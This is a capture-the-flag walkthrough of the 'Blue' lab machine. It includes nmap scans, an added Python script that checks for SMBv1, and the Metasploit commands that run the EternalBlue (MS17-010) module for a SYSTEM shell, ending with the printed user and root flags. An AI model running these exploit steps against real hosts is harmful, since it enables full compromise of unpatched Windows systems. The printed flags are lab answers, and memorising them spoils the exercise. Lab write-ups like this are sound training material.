Blue

TARGET IP: 10.10.10.40
HOST IP: 10.10.16.10
RECON
NMAP
nmap [Target IP]

nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 [Target IP]

Looks like we have SMB open (139 and 445), MSRPC on 135, and a handful of dynamic RPC endpoint ports (49152-49157) as well.
Based on the name alone, I'm highly suspicious that this thing is susceptible to EternalBlue (MS17-010). I'm going to use an Nmap scan I found in a previous lab to check which SMB dialects the server accepts.
nmap -p 445 --script smb-protocols [Target IP]
Note that smb-protocols only lists the dialects the server negotiates; it does not test the bug itself. The direct check is nmap -p 445 --script smb-vuln-ms17-010 [Target IP], which reports whether the host is still unpatched.

Since the host still allows SMBv1 and is running Windows 7, I'm fairly confident that EternalBlue will work.
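As an added example (not part of the original writeup), here is what the smb-protocols probe does on the wire, written as a stand-alone Python script. It sends a raw SMB_COM_NEGOTIATE that offers only the "NT LM 0.12" dialect and checks whether the server answers with an SMBv1 frame (0xFF "SMB"); a host with SMBv1 disabled either drops the connection or never returns that signature. The full MS17-010 probe that smb-vuln-ms17-010 and the Metasploit check perform (anonymous session setup, tree connect to IPC$, then a Trans2 SESSION_SETUP whose NT status reveals the patch state) is not reimplemented here; classify_ms17_010() shows only how that final status is interpreted. The TARGET value is the lab IP from the writeup, the field layout follows [MS-CIFS], and the response used for testing is a constructed vector, not a capture from the box.

```python
"""Raw SMBv1 negotiate probe plus MS17-010 status interpretation.
Added example for the Blue writeup; not the author's own code."""
import socket
import struct

TARGET = "10.10.10.40"           # lab IP from the writeup, used only under __main__
SMB1_MAGIC = b"\xffSMB"          # SMB2 replies start with b"\xfeSMB" instead
SMB_COM_NEGOTIATE = 0x72
NT_LM_012 = b"NT LM 0.12"

# NT status values returned by the MS17-010 Trans2 SESSION_SETUP probe; these are
# the codes the Metasploit 'check' and smb-vuln-ms17-010 key on.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched: vulnerable
STATUS_NOT_IMPLEMENTED = 0xC0000002          # patched
STATUS_INVALID_PARAMETER = 0xC000000D        # patched (different code path)


def smb1_header(command, flags=0x18, pid=0x1234, mid=1):
    """32-byte SMBv1 header ([MS-CIFS] 2.2.3.1); multi-byte fields are little-endian."""
    return (SMB1_MAGIC
            + struct.pack("<B", command)   # Command
            + struct.pack("<I", 0)         # Status
            + struct.pack("<B", flags)     # Flags: 0x18 = canonical paths, case-insensitive
            + struct.pack("<H", 0xC801)    # Flags2: Unicode, NT status, ext. security, long names
            + struct.pack("<H", 0)         # PIDHigh
            + b"\x00" * 8                  # SecurityFeatures
            + struct.pack("<H", 0)         # Reserved
            + struct.pack("<H", 0)         # TID
            + struct.pack("<H", pid)       # PIDLow
            + struct.pack("<H", 0)         # UID
            + struct.pack("<H", mid))      # MID


def netbios_wrap(smb):
    """NetBIOS session service header: type 0x00 plus 24-bit big-endian length."""
    return struct.pack(">I", len(smb)) + smb


def negotiate_request():
    """SMB_COM_NEGOTIATE offering a single dialect, as a ready-to-send frame."""
    dialects = b"\x02" + NT_LM_012 + b"\x00"   # BufferFormat 0x02 + NUL-terminated name
    body = struct.pack("<B", 0)                # WordCount = 0
    body += struct.pack("<H", len(dialects))   # ByteCount
    return netbios_wrap(smb1_header(SMB_COM_NEGOTIATE) + body + dialects)


def parse_smb1_response(data):
    """Return (command, nt_status, dialect_index) or None when not an SMBv1 frame.
    dialect_index is only filled for a NEGOTIATE reply; 0 means the server picked
    the first (here: only) dialect we offered, i.e. it speaks SMBv1."""
    if len(data) < 4 + 32:
        return None
    smb = data[4:]                             # strip the NetBIOS header
    if smb[:4] != SMB1_MAGIC:
        return None
    command = smb[4]
    nt_status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32] if len(smb) > 32 else 0
    dialect_index = None
    if command == SMB_COM_NEGOTIATE and word_count >= 1 and len(smb) >= 35:
        dialect_index = struct.unpack_from("<H", smb, 33)[0]
    return command, nt_status, dialect_index


def speaks_smb1(response):
    """True when the bytes are a successful SMBv1 NEGOTIATE reply selecting our dialect."""
    parsed = parse_smb1_response(response)
    return (parsed is not None and parsed[0] == SMB_COM_NEGOTIATE
            and parsed[1] == 0 and parsed[2] == 0)


def classify_ms17_010(nt_status):
    """Interpret the NT status of the Trans2 SESSION_SETUP probe."""
    if nt_status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"
    if nt_status in (STATUS_NOT_IMPLEMENTED, STATUS_INVALID_PARAMETER):
        return "patched"
    return "unknown"


def probe_smb1(host, port=445, timeout=5):
    """Live check: does the host accept an SMBv1 negotiate on port 445?"""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(negotiate_request())
            return speaks_smb1(s.recv(4096))
    except OSError:                            # refused, reset, or timed out
        return False


def constructed_negotiate_response():
    """Constructed SMBv1 NEGOTIATE reply (a test vector, not a capture from the box)."""
    smb = smb1_header(SMB_COM_NEGOTIATE, flags=0x98)   # 0x80 = reply bit
    smb += struct.pack("<B", 17)                         # WordCount = 17
    smb += struct.pack("<H", 0)                          # DialectIndex 0 -> 'NT LM 0.12'
    smb += b"\x00" * 32                                  # remaining 16 words, zeroed
    smb += struct.pack("<H", 0)                          # ByteCount
    return netbios_wrap(smb)


if __name__ == "__main__":
    print(f"{TARGET} speaks SMBv1: {probe_smb1(TARGET)}")
```

Run it against the lab box to reproduce the smb-protocols verdict; an SMBv1-only negotiate is a quick, quiet way to confirm the precondition before committing to the exploit.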
Exploit
Eternal Blue
msfconsole
search smb
use windows/smb/ms17_010_eternalblue
show options
Use the set command to set the different options.
set rhosts [Target IP]
set lhost [Host IP]

Now let's check to see if the host is vulnerable before moving forward.
check
Looks favorable. Let's exploit.
exploit
Let's start a command prompt shell and verify who we are.
shell
whoami
And whoami shows we already have SYSTEM-level privileges on the machine: the EternalBlue module runs its payload in a SYSTEM context, so there is no separate privilege escalation step. Wow, that was easy. Let's go grab the flags.
type C:\Users\haris\Desktop\user.txt

9ba10e548f8c18db7f90a5d1c5e2abc4
type C:\Users\Administrator\Desktop\root.txt

77a3bb72c76512c79b243e5235c38958
Conclusion
This was really easy and I had a feeling it was going to be. Since I first saw the name of this machine and that it was a Windows machine, I already guessed it was going to be an EternalBlue exploit.
I skipped a LOT of steps in the process that I normally would not have, but since I already had a pretty good idea of where to go, I figured I would give that a try. Worst case it doesn't work and I go back to my usual process of recon and enumeration to discover other methods.
Having done a couple of other labs with EternalBlue, I already knew how to exploit this machine, so it was pretty quick. It's also scary to think how easy this tool is to use to immediately gain admin power on a system. Good job on creating an awesome tool, NSA.